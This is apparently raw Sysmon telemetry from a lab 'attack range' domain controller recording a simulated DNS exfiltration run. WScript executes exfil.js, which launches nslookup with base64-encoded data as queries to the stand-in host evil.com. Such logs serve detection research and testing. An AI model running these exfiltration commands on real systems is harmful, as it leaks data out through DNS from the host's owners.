10341000x8000000000000000214430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.903{2E1864BB-18FB-629A-E045-000000005F02}37645472C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-E145-000000005F02}7864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.903{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-E145-000000005F02}7864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.903{2E1864BB-18FB-629A-DF45-000000005F02}53845012C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-E145-000000005F02}7864C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.910{2E1864BB-18FB-629A-E145-000000005F02}7864C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-DF45-000000005F02}5384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwdmyjk.tmp 2>&1 22542200x8000000000000000214422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.859{00000000-0000-0000-0000-000000000000}7988evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.731{00000000-0000-0000-0000-000000000000}644evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.640{00000000-0000-0000-0000-000000000000}7316evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.564{00000000-0000-0000-0000-000000000000}7376evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.476{00000000-0000-0000-0000-000000000000}6388evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.378{00000000-0000-0000-0000-000000000000}7984evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.261{00000000-0000-0000-0000-000000000000}2040evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.172{00000000-0000-0000-0000-000000000000}2824evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.090{00000000-0000-0000-0000-000000000000}2764evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.028{00000000-0000-0000-0000-000000000000}5596evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000214412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.941{00000000-0000-0000-0000-000000000000}6688evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000214411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.882{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-E045-000000005F02}3764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.882{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-E045-000000005F02}3764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.882{2E1864BB-18FB-629A-E045-000000005F02}37645472C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-DF45-000000005F02}5384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.866{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-E045-000000005F02}3764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.866{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.866{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.866{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.866{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.866{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-DF45-000000005F02}5384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.866{2E1864BB-18E0-629A-6742-000000005F02}39764288C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-DF45-000000005F02}5384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.873{2E1864BB-18FB-629A-DF45-000000005F02}5384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwdmyjk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.850{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhgrz.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.835{2E1864BB-18FB-629A-DD45-000000005F02}76167336C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-DE45-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.835{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.835{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.835{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.835{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.835{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-DE45-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.835{2E1864BB-18FB-629A-DC45-000000005F02}59882020C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-DE45-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.840{2E1864BB-18FB-629A-DE45-000000005F02}5928C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-DC45-000000005F02}5988C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhgrz.tmp 2>&1 10341000x8000000000000000214391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 